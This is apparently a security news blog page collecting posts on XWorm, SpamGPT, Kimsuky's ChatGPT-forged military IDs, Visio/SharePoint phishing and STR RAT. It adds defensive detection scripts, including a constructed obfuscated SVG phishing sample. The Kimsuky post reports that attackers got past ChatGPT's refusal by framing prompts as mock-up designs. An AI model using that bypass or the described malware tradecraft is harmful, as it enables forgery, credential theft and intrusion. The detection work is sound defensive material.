Posts with label Phishing Campaigns

New XWorm Malware Variants Emerge in Phishing Campaigns with Advanced Plugin Capabilities

 

New variants of the XWorm backdoor malware are being actively spread through phishing campaigns after its original creator, known as XCoder, abandoned the project last year.

The latest editions — XWorm 6.0, 6.4, and 6.5 — have been adopted by multiple cybercriminal groups. These updated versions include plugin support that enables a wide range of malicious activities, from data theft and remote system access to file encryption and decryption.

The most recent release developed by XCoder was version 5.6, which contained a remote code execution (RCE) vulnerability. The newly distributed variants reportedly fix that flaw while introducing enhanced attack features.

First detected in 2022, XWorm gained notoriety for its modular structure and broad feature set. It’s primarily used to harvest sensitive data such as passwords, cryptocurrency wallets, and financial information. The malware can also record keystrokes, extract clipboard data, perform DDoS attacks, and deliver other malicious payloads.

After XCoder deleted their Telegram channels, cracked versions of the malware began circulating widely, with various threat actors distributing them. In fact, one campaign even used XWorm itself as bait to target less-experienced hackers—infecting over 18,000 systems globally, primarily across Russia, the U.S., India, Ukraine, and Turkey.

A new version of XWorm appeared on a hacker forum, advertised by a user named XCoderTools, who offered access for a $500 lifetime subscription. Although it’s unclear if this is the same developer, the user claimed that the new versions fixed the RCE issue and introduced multiple updates.

Cybersecurity researchers at Trellix have observed a rise in XWorm samples on VirusTotal since June, suggesting the malware’s increasing popularity among threat actors.

In one campaign, XWorm was distributed using malicious JavaScript that executed a PowerShell script capable of bypassing Microsoft’s Antimalware Scan Interface (AMSI) to install the backdoor.

According to Trellix’s September report, “the XWorm malware infection chain has evolved to include additional techniques beyond traditional email-based attacks.” While .LNK files and email attachments remain common entry points, newer variants disguise themselves as legitimate executables — even mimicking applications like Discord.

“This marks a shift towards combining social engineering with technical attack vectors for greater effectiveness,” Trellix explained.

Further analyses revealed campaigns using AI-themed phishing lures and a modified version of ScreenConnect, as well as cases where malicious Excel files (.XLAM) embedded with shellcode delivered the payload.

Trellix researchers uncovered over 35 plugins associated with the latest XWorm versions, significantly expanding its functions — including a ransomware component.

The Ransomware.dll plugin allows attackers to lock victims’ files, demand payment, and customize ransom notes, wallpaper messages, and Bitcoin wallet details. The encryption avoids system-critical directories, focusing on user folders like %USERPROFILE% and Documents. Encrypted files are appended with the .ENC extension, while a ransom instruction HTML file is dropped on the desktop.

Code analysis revealed similarities between XWorm's ransomware module and the NoCry ransomware from 2021: both encrypt with AES in CBC mode and process each file in 4,096-byte chunks (the chunk is the read buffer, not the cipher block size, which is 16 bytes for AES).
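The behaviour described for Ransomware.dll (many user-profile files gaining a .ENC extension in a short burst, system directories untouched, an HTML note written to the Desktop) is something an EDR can catch from file events alone. The script below is an added example, not Trellix's detection content: the events are constructed Sysmon-style records and the threshold of five renames within sixty seconds is an assumption to tune against your own telemetry.

```python
"""Behavioural detection for the XWorm ransomware-plugin pattern over file events.
Added example; events, paths and thresholds are constructed/assumed."""
from collections import defaultdict

# Constructed sample, pipe-delimited: ts|pid|image|op|path[|new_path]
EVENTS = r"""
1700000000|4120|C:\Users\alice\AppData\Roaming\svchost.exe|rename|C:\Users\alice\Documents\q3.xlsx|C:\Users\alice\Documents\q3.xlsx.ENC
1700000001|4120|C:\Users\alice\AppData\Roaming\svchost.exe|rename|C:\Users\alice\Documents\plan.docx|C:\Users\alice\Documents\plan.docx.ENC
1700000001|4120|C:\Users\alice\AppData\Roaming\svchost.exe|rename|C:\Users\alice\Pictures\a.jpg|C:\Users\alice\Pictures\a.jpg.ENC
1700000002|4120|C:\Users\alice\AppData\Roaming\svchost.exe|rename|C:\Users\alice\Pictures\b.jpg|C:\Users\alice\Pictures\b.jpg.ENC
1700000003|4120|C:\Users\alice\AppData\Roaming\svchost.exe|rename|C:\Users\alice\Desktop\notes.txt|C:\Users\alice\Desktop\notes.txt.ENC
1700000004|4120|C:\Users\alice\AppData\Roaming\svchost.exe|create|C:\Users\alice\Desktop\HOW_TO_DECRYPT.html
1700000100|812|C:\Program Files\7-Zip\7z.exe|create|C:\Users\alice\Downloads\archive.ENC
1700000200|980|C:\Windows\System32\svchost.exe|create|C:\Windows\Temp\x.ENC
"""

MIN_ENC_FILES = 5      # assumed threshold: renames needed inside one window
WINDOW_SECONDS = 60    # assumed window length

def parse(line):
    parts = line.split("|")
    return {"ts": int(parts[0]), "pid": parts[1], "image": parts[2], "op": parts[3],
            "path": parts[4], "new": parts[5] if len(parts) > 5 else None}

def in_user_profile(path):
    # The plugin targets %USERPROFILE%; anything under C:\Windows is out of pattern.
    return path.lower().startswith("c:\\users\\")

def detect(events_text):
    """Return one alert per process that mass-renamed user files to .ENC."""
    per_pid = defaultdict(lambda: {"image": "", "enc": [], "note": None})
    for line in events_text.strip().splitlines():
        e = parse(line)
        rec = per_pid[e["pid"]]
        rec["image"] = e["image"]
        target = e["new"] or e["path"]
        if not in_user_profile(target):
            continue
        if target.upper().endswith(".ENC") and e["op"] in ("rename", "create"):
            rec["enc"].append((e["ts"], target))
        elif e["op"] == "create" and "\\desktop\\" in target.lower() and target.lower().endswith(".html"):
            rec["note"] = (e["ts"], target)
    alerts = []
    for pid, rec in per_pid.items():
        times = sorted(t for t, _ in rec["enc"])
        # Sliding window: any MIN_ENC_FILES consecutive renames within WINDOW_SECONDS.
        burst = any(times[i + MIN_ENC_FILES - 1] - times[i] <= WINDOW_SECONDS
                    for i in range(len(times) - MIN_ENC_FILES + 1))
        if burst:
            alerts.append({"pid": pid, "image": rec["image"], "encrypted": len(rec["enc"]),
                           "ransom_note": rec["note"][1] if rec["note"] else None,
                           "severity": "high" if rec["note"] else "medium"})
    return alerts

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
```

A single .ENC file from an archiver, or .ENC writes under C:\Windows, do not trip the rule; the ransom note on the Desktop raises severity rather than being required, since a plugin variant could be configured without one.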

Beyond ransomware, other identified modules include:

  • RemoteDesktop.dll – Enables full remote control sessions.
  • Stealer.dll, Chromium.dll, Recovery.dll – Extract credentials and application data.
  • FileManager.dll – Grants file system access and manipulation.
  • Shell.dll – Executes commands through hidden CMD processes.
  • Webcam.dll – Captures video from the infected system's webcam.
  • TCPConnections.dll & ActiveWindows.dll – Send live system and network data to command servers.

With modules designed to steal data from more than 35 browsers, email clients, and crypto wallets, the malware represents a serious risk to both individuals and organizations.

Trellix recommends a multi-layered cybersecurity defense, including EDR solutions for detecting malicious behavior, and email/web gateways to block droppers. Network monitoring tools can also help identify communications with command-and-control (C2) servers and prevent data exfiltration.

Microsoft Stops Phishing Scam Which Used Gen-AI Code to Fool Victims


AI: Boon or Curse?

AI-generated code is now used across sectors for a variety of tasks, cybersecurity included, and both threat actors and security teams have turned to LLMs to support their work.

Security teams use AI to track and respond to threats at scale, while attackers are experimenting with AI to build phishing lures, generate obfuscated code, and disguise malicious payloads.

Microsoft Threat Intelligence recently detected and blocked a phishing campaign that appears to have used AI-generated code to conceal its payload inside an SVG file.

About the campaign 

The campaign used a small business email account to send self-addressed messages, with the actual targets hidden in the BCC field. The attachment was named to look like a PDF but actually contained SVG content with an embedded script.

The SVG used invisible elements styled to resemble a business dashboard, while the embedded script decoded a sequence of business terms back into code, revealing the hidden payload. Once opened, the file redirected the user to a CAPTCHA gate, a common social engineering step, and from there to a fake sign-in page used to steal credentials.

The obfuscation relied on a dictionary of business words and formulaic code patterns rather than on cryptographic techniques.
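The signals Microsoft describes (a file named as a PDF that is really SVG, an embedded script, a browser redirect, and a dictionary that maps ordinary business words back to code) can be checked mechanically at a mail gateway before a user ever opens the attachment. The following is an added example, not Microsoft's detection logic; both attachments are constructed and the "five words, five mappings" threshold for the dictionary heuristic is an assumption.

```python
"""Triage an email attachment whose name claims PDF but whose bytes may be SVG.
Added example; sample attachments are constructed, thresholds are assumptions."""
import re

# Constructed sample: what a gateway would see for a real PDF.
GENUINE_PDF = b"%PDF-1.7\n1 0 obj << /Type /Catalog >> endobj\n%%EOF\n"

# Constructed sample: SVG "dashboard" with a word-to-character dictionary and a redirect.
MALICIOUS_SVG = (
    b'<?xml version="1.0"?>\n'
    b'<svg xmlns="http://www.w3.org/2000/svg" width="800" height="600">\n'
    b'  <rect width="800" height="600" fill="#fff" opacity="0"/>\n'
    b'  <text x="10" y="20" fill="#fff">Quarterly Revenue Dashboard</text>\n'
    b'  <script><![CDATA[\n'
    b'    var terms=["revenue","operations","risk","shares","growth"];\n'
    b'    var map={revenue:"w",operations:"i",risk:"n",shares:"d",growth:"o"};\n'
    b'    var out="";for(var i=0;i<terms.length;i++){out+=map[terms[i]];}\n'
    b'    location.href="https://example.invalid/captcha";\n'
    b'  ]]></script>\n'
    b'</svg>\n'
)

SVG_SCRIPT_RE = re.compile(rb"<script\b|on(load|click|error)\s*=|javascript:", re.I)
REDIRECT_RE = re.compile(rb"(location\.(href|replace)|window\.open)\s*[=(]", re.I)
# Many quoted ordinary words plus a map from words to single characters is the
# "business vocabulary" obfuscation pattern rather than real application data.
WORD_LITERAL_RE = re.compile(rb'"[a-z]{4,}"')
CHAR_MAP_RE = re.compile(rb'[a-z]+\s*:\s*"."')

def sniff_type(data: bytes) -> str:
    """Content-based type, ignoring the filename entirely."""
    head = data.lstrip()[:512]
    if head.startswith(b"%PDF-"):
        return "pdf"
    if head.startswith(b"<?xml") or head.startswith(b"<svg"):
        return "svg" if b"<svg" in head.lower() else "xml"
    return "unknown"

def triage_attachment(filename: str, data: bytes) -> dict:
    declared = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    actual = sniff_type(data)
    findings = []
    if declared == "pdf" and actual != "pdf":
        findings.append(f"extension says pdf but content is {actual}")
    if actual == "svg":
        if SVG_SCRIPT_RE.search(data):
            findings.append("svg contains script")
        if REDIRECT_RE.search(data):
            findings.append("svg script redirects the browser")
        if len(WORD_LITERAL_RE.findall(data)) >= 5 and len(CHAR_MAP_RE.findall(data)) >= 5:
            findings.append("word-to-character mapping (dictionary obfuscation)")
    return {"declared": declared, "actual": actual, "findings": findings,
            "verdict": "block" if findings else "allow"}

if __name__ == "__main__":
    print(triage_attachment("report.pdf", GENUINE_PDF))
    print(triage_attachment("Invoice.pdf", MALICIOUS_SVG))
```

The type sniff is deliberately done on bytes, never on the Content-Type header or extension, because both are attacker-controlled; a legitimate SVG diagram with no script still passes.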

Microsoft Security Copilot analyzed the file and listed markers consistent with LLM-generated output. These traits made the code look polished on the surface, but they led the analysts to conclude it was AI generated.

Combating the threat

Analysts used the AI-powered tools in Microsoft Defender for Office 365 to correlate signals that were difficult for the attackers to hide.

The tooling flagged the unusual self-addressed email pattern, the SVG file disguised as a PDF, the redirect to a known phishing site, the obfuscated code within the file, and the anti-analysis techniques used on the phishing page.

The campaign, which mainly targeted US-based organizations, was detected and blocked. Microsoft nevertheless noted that the attack shows how aggressively threat actors are experimenting with AI to build convincing lures and more sophisticated payloads.

SpamGPT: AI-Powered Phishing Tool Puts Cybersecurity at Risk

 

While most people have heard of ChatGPT, a new threat called SpamGPT is now making headlines. Security researchers at Varonis have discovered that this professional-grade email campaign tool is designed specifically for cybercriminals. The platform, they report, offers “all the conveniences a Fortune 500 marketer might expect, but adapted for cybercrime.”

SpamGPT’s dashboard closely mimics legitimate email marketing software, allowing attackers to plan, schedule, and track large-scale spam and phishing campaigns with minimal effort. By embedding AI-powered features, the tool can craft realistic phishing emails, optimize subject lines, and fine-tune scams—making it accessible even to criminals with little technical background.

"SpamGPT is essentially a CRM for cybercriminals, automating phishing at scale, personalizing attacks with stolen data, and optimizing conversion rates much like a seasoned marketer would. It's also a chilling reminder that threat actors are embracing AI tools just as fast as defenders are," explained Rob Sobers, CMO at Varonis.

The toolkit includes built-in modules for SMTP/IMAP configuration, inbox monitoring, and deliverability testing. Attackers can upload stolen SMTP credentials, verify them through an integrated checker, and rotate multiple servers to avoid detection. IMAP monitoring further allows criminals to track replies, bounces, and email placement.

A real-time inbox check feature sends test emails and confirms whether they land in inboxes or spam folders. Combined with campaign analytics, SpamGPT functions much like a legitimate customer relationship management (CRM) platform—but is weaponized for phishing, ransomware, and other cyberattacks.

Marketed as a “spam-as-a-service” solution, SpamGPT lowers the skill barrier for cybercrime. Tutorials such as “SMTP cracking mastery” guide users in obtaining or hacking mail servers, while custom header options make it easier to impersonate trusted brands or domains. Even inexperienced attackers can therefore run large-scale campaigns, and spoofed mail will reach inboxes wherever the impersonated domain does not publish and enforce SPF, DKIM, and DMARC.

Experts warn that the rise of SpamGPT could trigger a surge in phishing, ransomware, and malware attacks. Its ability to slip past spam filters and disguise malicious payloads as legitimate correspondence makes it especially dangerous for both individuals and businesses.

To counter threats like SpamGPT, cybersecurity experts recommend:

  • Enforcing DMARC, SPF, and DKIM to block spoofed emails.

  • Deploying AI-driven phishing detection tools.

  • Maintaining regular backups and malware removal protocols.

  • Implementing multi-factor authentication (MFA) across all accounts.

  • Providing ongoing phishing awareness training for employees.

  • Using network segmentation and least-privilege access controls.

  • Keeping software and security patches updated.

  • Testing and refining incident response plans for rapid recovery.
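The first item on that list is the one that most directly blunts a tool like SpamGPT, and it is also the one most often configured in a way that achieves nothing. The audit below is an added example, not Varonis' tooling: it takes SPF and DMARC TXT values (constructed here as an in-memory zone; in production they would come from a DNS lookup) and reports the settings that still let a spoofed From: through, with a hardened record beside the weak one.

```python
"""Audit SPF and DMARC records for the settings that let spoofed mail through.
Added example; zone data is constructed and domains are placeholders."""
import re

# Constructed sample zones keyed by DNS name: the same domain, weak and hardened.
WEAK_ZONE = {
    "example.invalid": "v=spf1 include:_spf.mailhost.invalid +all",
    "_dmarc.example.invalid": "v=DMARC1; p=none; rua=mailto:dmarc@example.invalid",
}
HARDENED_ZONE = {
    "example.invalid": "v=spf1 include:_spf.mailhost.invalid -all",
    "_dmarc.example.invalid": "v=DMARC1; p=reject; pct=100; adkim=s; aspf=s; rua=mailto:dmarc@example.invalid",
}

# SPF terms that cost a DNS lookup (RFC 7208 caps the total at 10).
LOOKUP_RE = re.compile(
    r"[+\-~?]?(include:\S+|a(?:[:/]\S*)?|mx(?:[:/]\S*)?|ptr(?::\S+)?|exists:\S+|redirect=\S+)", re.I)

def parse_dmarc(txt: str) -> dict:
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    return tags

def audit_domain(domain: str, zone: dict) -> list:
    """Return findings; an empty list means spoofed mail should be rejected."""
    findings = []
    spf = zone.get(domain, "")
    if not spf.lower().startswith("v=spf1"):
        findings.append("no SPF record: any host may send as this domain")
    else:
        terms = spf.split()
        last = terms[-1].lower()   # the trailing 'all' decides unmatched senders
        if last in ("+all", "all", "?all"):
            findings.append(f"SPF ends with '{last}': unmatched senders pass")
        elif last == "~all":
            findings.append("SPF ends with '~all': softfail only; rely on DMARC p=reject")
        lookups = sum(1 for t in terms if LOOKUP_RE.fullmatch(t))
        if lookups > 10:
            findings.append(f"SPF needs {lookups} DNS lookups (limit 10): receivers return permerror")
    dmarc = parse_dmarc(zone.get(f"_dmarc.{domain}", ""))
    if dmarc.get("v", "").upper() != "DMARC1":
        findings.append("no DMARC record: receivers will not enforce alignment")
    else:
        policy = dmarc.get("p", "none").lower()
        if policy == "none":
            findings.append("DMARC p=none: monitoring only, spoofed mail is delivered")
        elif policy == "quarantine":
            findings.append("DMARC p=quarantine: spoofed mail lands in spam, not rejected")
        pct = int(dmarc.get("pct", "100"))
        if policy != "none" and pct < 100:
            findings.append(f"DMARC pct={pct}: policy applied to only {pct}% of mail")
        if "rua" not in dmarc:
            findings.append("no rua= address: aggregate reports are not collected")
    return findings

if __name__ == "__main__":
    for name, zone in (("weak", WEAK_ZONE), ("hardened", HARDENED_ZONE)):
        print(name, audit_domain("example.invalid", zone) or ["ok"])
```

To run it against live DNS, replace the zone dictionary with TXT lookups (for example dnspython's resolver.resolve(name, "TXT")) and join the quoted strings of each answer; the checks themselves do not change.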

SpamGPT demonstrates how cybercriminals are harnessing AI to evolve their tactics. As defenses improve, attackers are adapting just as quickly—making vigilance and layered security strategies more critical than ever.

North Korean Threat Actors Leverage ChatGPT in Deepfake Identity Scheme


The North Korean state-backed group Kimsuky has used ChatGPT to produce convincing fake South Korean military identification cards, a troubling example of how generative AI is being weaponised in state-sponsored cyber operations. 

The forged documents were embedded in phishing emails targeting defence institutions and individuals as part of a cyber-espionage campaign, lending the messages an extra layer of credibility. 

The AI-generated IDs made a series of attacks designed to deceive recipients, deliver malware, and exfiltrate sensitive data more effective. Security monitors categorised the incident as an AI-related hazard: misuse of ChatGPT directly contributed to the compromise of confidential information and the violation of personal rights. 

The case highlights growing concern about generative AI in sophisticated state-sponsored operations. Combining deepfake technology with phishing makes these attacks harder to detect and considerably more damaging. 

Palo Alto Networks' Unit 42 has separately observed a disturbing rise in real-time deepfakes used in job interviews, with candidates concealing their true identities from prospective employers. In Unit 42's assessment the tactic is alarmingly accessible: it can be set up in a matter of hours with minimal technical skill and inexpensive consumer-grade hardware. 

That investigation was prompted by a report in the Pragmatic Engineer newsletter describing two fake applicants, nearly hired by a Polish AI company, whose behaviour suggested that both deepfake personas were controlled by the same individual. 

Unit 42 assesses these practices as a logical progression of a long-running North Korean scheme in which IT operatives infiltrate organisations under false pretences, a strategy well documented in earlier threat reports. 

Kimsuky has for years been accused of conducting espionage against South Korean targets under the direction of the North Korean state. A 2020 advisory from the U.S. Department of Homeland Security assessed that the group is tasked with gathering global intelligence on Pyongyang's behalf. 

Recent research from South Korean security firm Genians shows how AI is increasingly folded into such operations. Genians documented a July campaign in which North Korean actors manipulated ChatGPT into producing fake ID cards, and further experiments showed that simple prompt adjustments were enough to get around the platform's built-in restrictions. 

This follows a familiar pattern: Anthropic disclosed in August that North Korean operatives had misused its Claude Code tool to build elaborate fake personas, pass coding assessments, and secure remote positions at multinational companies. 

In February, OpenAI confirmed it had suspended accounts tied to North Korea that were generating fraudulent resumes, cover letters, and social media content to support recruitment fraud. According to Genians director Mun Chong-hyun, these activities show AI's growing role at many stages of cyber operations, from designing attack scenarios and developing malware to impersonating recruiters and targets. 

The latest campaign also impersonated an official South Korean military domain (.mil.kr) in phishing emails aimed at journalists, researchers, and human rights activists. It is still unclear how many recipients were compromised or how much of the activity was blocked. 

The United States officially asserts that such cyber activity is part of a broader North Korean strategy, alongside cryptocurrency theft and IT contracting schemes, to gather intelligence and generate revenue that circumvents sanctions and funds the country's nuclear weapons programme. 

Kimsuky, also tracked as APT43, the state-backed unit suspected of running the July campaign, had already been sanctioned by Washington and its allies for advancing Pyongyang's foreign policy goals and evading sanctions. 

Genians researchers reported that the group used ChatGPT to create sample government and military ID cards, then incorporated them into phishing emails disguised as official correspondence from a South Korean defence agency that manages ID services. 

Along with the fraudulent ID card, these messages delivered malware designed to steal data and give the attackers remote access to compromised systems. Analysis confirmed the counterfeit IDs were produced with ChatGPT despite its safeguards against replicating government documents; the attackers appear to have evaded those safeguards by framing their prompts as requests for mock-up designs. 

Kimsuky's adoption of deepfake technology marks a significant step: generative AI substantially lowers the barrier to producing convincing forgeries. 

Kimsuky has been active since at least 2012, targeting government officials, academics, think tanks, journalists, and activists in South Korea, Japan, the United States, Europe, and Russia, as well as people working on North Korea policy and human rights issues. 

Research shows the regime relies heavily on AI to produce fake resumes and online personas, enabling North Korean IT operatives to obtain overseas employment and perform technical work once embedded. These operatives use a range of deceptive practices to hide their origins and evade detection, including AI-assisted identity fabrication and collaboration with foreign intermediaries. 

The South Korean foreign ministry has endorsed that assessment. The growing use of generative AI in cyber-espionage poses a major challenge for global cybersecurity frameworks: people must be helped to recognise and defend against threats that rely less on technical sophistication than on the exploitation of trust. 

Although ChatGPT and other large language models have guardrails, experts warn that adversaries will keep probing for weaknesses and adapting their tactics through prompt manipulation, social engineering, and deepfake augmentation. 

Kimsuky illustrates how AI-enabled cybercrime erodes traditional detection methods: counterfeit identities, forged credentials, and fabricated personas blur the line between legitimate interaction and malicious deception. 

Security experts urge a multi-layered response combining AI-driven detection tools, robust digital identity verification, cross-border intelligence sharing, and better awareness in targeted sectors such as defence, academia, and human rights. 

Collaboration between AI developers, governments, and private enterprises will be critical to ensuring these technologies are used responsibly and their misuse is minimised. As adversaries sharpen their attacks with AI, defenders must adapt just as quickly to protect trust, privacy, and global security.

New Two-Step Phishing Attack Exploits Microsoft Visio and SharePoint

 

A novel two-step phishing technique abuses Microsoft Visio files (.vsdx) and SharePoint, signaling a new trend in cyber deception, according to experts. Researchers at Perception Point have noted a significant rise in attacks leveraging these previously uncommon .vsdx files.

These files act as delivery tools, directing victims to phishing pages that replicate Microsoft 365 login portals, aiming to steal user credentials.

The two-step phishing attacks employ layered techniques to evade detection. Rather than delivering harmful content directly, these campaigns use trusted platforms like Microsoft SharePoint to host files that appear legitimate. Attackers embed URLs within Visio files, which redirect victims to malicious websites when clicked, bypassing traditional email security systems.

Microsoft Visio, a popular tool for professional diagram creation, has now become a phishing vector. Cybercriminals send emails with Visio files from compromised accounts, often mimicking urgent business communications such as proposals or purchase orders. This tactic encourages recipients to act quickly, increasing the likelihood of success.

Since the emails come from stolen accounts, they often pass authentication checks and evade recipient security filters. In some cases, attackers include .eml files within the emails, embedding additional malicious URLs linked to SharePoint-hosted files.

The Visio files typically contain a clickable button labeled "View Document." Victims are instructed to hold the Ctrl key while clicking the button to open the malicious URL. Because that step requires a specific manual interaction, automated sandboxes and URL crawlers that do not simulate it never follow the link.
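A detonation sandbox may never Ctrl+click the button, but the URL has to be in the file, and a .vsdx is an ordinary Office Open XML package (a zip of XML parts plus relationship files). The extractor below is an added example, not Perception Point's tooling: it builds a constructed minimal package standing in for a real attachment, then pulls every external target from the package's .rels parts and any literal URL from the page XML. Because it only relies on the packaging conventions, the same function also works on .docx, .xlsx and .pptx attachments; the link and host names are placeholders.

```python
"""Extract external hyperlinks from a Visio .vsdx (or any OOXML package).
Added example; the sample package is constructed, URLs are placeholders."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

def build_sample_vsdx(target_url: str) -> bytes:
    """Constructed package: one page, one shape reading 'View Document' with a hyperlink."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
            '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("visio/pages/page1.xml",
            '<?xml version="1.0"?><PageContents xmlns="http://schemas.microsoft.com/office/visio/2012/main">'
            '<Shapes><Shape ID="1"><Text>View Document</Text>'
            '<Section N="Hyperlink"><Row N="Row_1"><Cell N="Address" V="rId1"/></Row></Section>'
            '</Shape></Shapes></PageContents>')
        z.writestr("visio/pages/_rels/page1.xml.rels",
            f'<?xml version="1.0"?><Relationships xmlns="{RELS_NS}">'
            f'<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
            f'Target="{target_url}" TargetMode="External"/></Relationships>')
    return buf.getvalue()

def extract_external_links(package: bytes) -> list:
    """Return sorted unique (part, url) pairs for every external target in the package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        for name in z.namelist():
            data = z.read(name)
            if name.endswith(".rels"):
                root = ET.fromstring(data)
                for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                    if rel.get("TargetMode") == "External":
                        found.append((name, rel.get("Target")))
            elif name.endswith(".xml"):
                # Some generators write the URL straight into the part XML instead.
                for url in URL_RE.findall(data.decode("utf-8", "replace")):
                    if not url.startswith("http://schemas."):   # skip namespace URIs
                        found.append((name, url))
    return sorted(set(found))

def triage_links(package: bytes) -> dict:
    links = extract_external_links(package)
    hosts = sorted({urlparse(u).hostname or "" for _, u in links})
    return {"links": links, "hosts": hosts, "needs_review": bool(links)}

if __name__ == "__main__":
    print(triage_links(build_sample_vsdx("https://contoso-files.sharepoint.invalid/sites/docs/view")))
```

Feed the extracted URLs to the dynamic URL analysis the post recommends; a SharePoint host in the list is not a reason to skip that step, since the whole point of the technique is that the first hop is a trusted platform.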

Perception Point advises organizations to strengthen their defenses against sophisticated phishing campaigns by adopting advanced threat detection solutions. Suggested measures include:

  • Dynamic URL analysis to identify harmful links.
  • Object detection models to flag suspicious files.
  • Enhanced authentication mechanisms to reduce the impact of compromised accounts.

STR RAT: A Persistent Remote Access Trojan

 

The STR RAT is a remote access trojan (RAT) written in Java, first detected in 2020. Like other RATs, it allows threat actors full control of an infected machine. STR RAT is capable of keylogging, credential theft, and deploying additional malicious payloads. 

The malware is updated annually, aligning with its renewed use by threat actors. Cofense's analysis from January 2023 to April 2024 reveals that 60% of STR RAT samples are delivered directly via email rather than embedded links.

History of STR RAT

STR RAT resembles a seasonal flu, with yearly updates making it more prominent for short periods. Initially discovered on an antivirus forum in 2020, version 1.2 already featured keylogging, password theft, and backdoor access, along with a fake “.crimson” ransomware module that only renamed files. In 2021, Microsoft Threat Intelligence highlighted STR RAT in phishing campaigns. By 2022, it spoofed the Maersk shipping brand and employed a polyglot file technique, allowing execution as an MSI or Java file. In 2023, version 1.6 used Zelix KlassMaster and Allatori for code obfuscation. In 2024, STR RAT was uploaded to legitimate services like GitHub and AWS, making it harder to detect.

STR RAT steals passwords from Chrome, Firefox, Internet Explorer, and email clients like Outlook, Thunderbird, and Foxmail. Key commands include o-keylogger for logging keystrokes, down-n-exec for file execution, remote-screen for commandeering the computer, and power-shell for PowerShell access.

Current Usage and Impact

Though not as prevalent as other RATs like Remcos, STR RAT showed sustained activity from March to August 2023, likely due to the new version and polyglot file technique. In March 2024, significant activity was noted again, attributed to the use of legitimate services like GitHub and AWS for hosting and delivering the malware. STR RAT is typically delivered via email as an archive containing a .jar file, requiring a Java Runtime Environment (JRE) to execute. These archives may also contain necessary JRE binaries or download them from Maven and GitHub repositories.

Delivery Mechanisms

STR RAT's second most common delivery mechanism is loaders, which reach out to a payload location to download and run the malware. Jar Downloaders, CVE-2017-11882 exploits in Microsoft Office, and Windows Registry File downloaders are commonly used loaders. Additionally, embedded URLs in emails or attached PDFs often lead to the malware hosted on legitimate services like AWS, GitHub, and Discord’s CDN.

Unlike loaders, droppers contain the malware to be deployed. STR RAT's most common dropper is the JavaScript Dropper (JS Dropper), a .js file that executes natively on Windows. JS Droppers are usually attached to emails and contain both the dropper and STR RAT.

Behavior and Capabilities

Upon execution, STR RAT places files, creates persistence, and installs dependencies. It uses geolocator services to geo-fingerprint infected computers and sends system information to its command-and-control (C2) server. The malware also uses legitimate Java libraries for keylogging and database connectivity.

Detection and Hunting

Different versions of STR RAT leave different indicators of compromise (IOCs). After execution, STR RAT copies itself to multiple locations, creates a \lib\ folder populated with legitimate library files, and writes an XXXXlock.file in the user's local home profile. Its configuration, including the C2 server, port, and domain, can be recovered through memory analysis.

Persistence

STR RAT can create persistence through Registry Run Keys, Startup Folder entries, or Scheduled Tasks, ensuring the malware runs every time the user logs in. Endpoint detection and response software can monitor specific locations for signs of STR RAT persistence.

Network Traffic

STR RAT communicates with C2 servers using subdomains of free dynamic DNS services and legitimate services like GitHub and Maven. HTTP is used for C2 communications, though the port is not the standard tcp/80.
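Taken together, the two network traits above (HTTP on a port other than tcp/80 to a free dynamic-DNS name, and fetches from GitHub or Maven that stage the JRE and libraries) make a workable hunting rule, provided the GitHub/Maven traffic on its own is not alerted on, since it is normal developer activity. The scorer below is an added example, not Cofense's detection content: the connection log lines are constructed, the dynamic-DNS suffix list is illustrative and should be replaced with your own intelligence, and the weights are assumptions.

```python
"""Score source hosts for STR RAT-style C2 behaviour over connection log lines.
Added example; log lines, suffix lists and weights are constructed/assumed."""
from collections import defaultdict

# Constructed sample: ts src dst_ip dst_port app_protocol http_host
LOG = """\
1712000000.1 10.0.0.5 203.0.113.10 1780 http updates.example-ddns.invalid
1712000001.4 10.0.0.5 140.82.112.3 443 ssl raw.githubusercontent.com
1712000002.2 10.0.0.5 199.232.192.209 443 ssl repo1.maven.org
1712000003.0 10.0.0.5 203.0.113.10 1780 http updates.example-ddns.invalid
1712000010.0 10.0.0.9 140.82.112.3 443 ssl raw.githubusercontent.com
1712000011.0 10.0.0.9 93.184.216.34 80 http www.example.com
1712000020.0 10.0.0.7 198.51.100.7 8081 http api.internal.example
"""

# Illustrative; extend from threat intel. example-ddns.invalid is a stand-in.
DYNDNS_SUFFIXES = ("example-ddns.invalid", "duckdns.org", "no-ip.org", "ddns.net", "hopto.org")
STAGING_HOSTS = ("raw.githubusercontent.com", "github.com", "repo1.maven.org", "repo.maven.apache.org")
STANDARD_HTTP_PORTS = {80, 8080}

def parse_line(line):
    ts, src, dst, port, app, host = line.split()
    return {"ts": float(ts), "src": src, "dst": dst, "port": int(port), "app": app, "host": host.lower()}

def is_dyndns(host):
    # Suffix match on label boundaries, so 'duckdns.org.example.com' does not match.
    return any(host == s or host.endswith("." + s) for s in DYNDNS_SUFFIXES)

def score_hosts(log_text):
    """Return {src: {"score": n, "reasons": [...]}} for sources that show a C2 signal."""
    by_src = defaultdict(lambda: {"score": 0, "reasons": []})
    seen = set()   # count each (src, indicator) once, not per connection
    for line in log_text.strip().splitlines():
        e = parse_line(line)
        s = by_src[e["src"]]
        if e["app"] == "http" and e["port"] not in STANDARD_HTTP_PORTS and is_dyndns(e["host"]):
            key = (e["src"], "c2", e["host"], e["port"])
            if key not in seen:
                seen.add(key)
                s["score"] += 5
                s["reasons"].append(f"HTTP on tcp/{e['port']} to dynamic-DNS host {e['host']}")
        elif e["host"] in STAGING_HOSTS:
            key = (e["src"], "stage", e["host"])
            if key not in seen:
                seen.add(key)
                s["score"] += 1
                s["reasons"].append(f"fetch from staging host {e['host']}")
    # Staging fetches alone never reach the threshold; they only corroborate a C2 hit.
    return {src: v for src, v in by_src.items() if v["score"] >= 5}

if __name__ == "__main__":
    for src, v in score_hosts(LOG).items():
        print(src, v)
```

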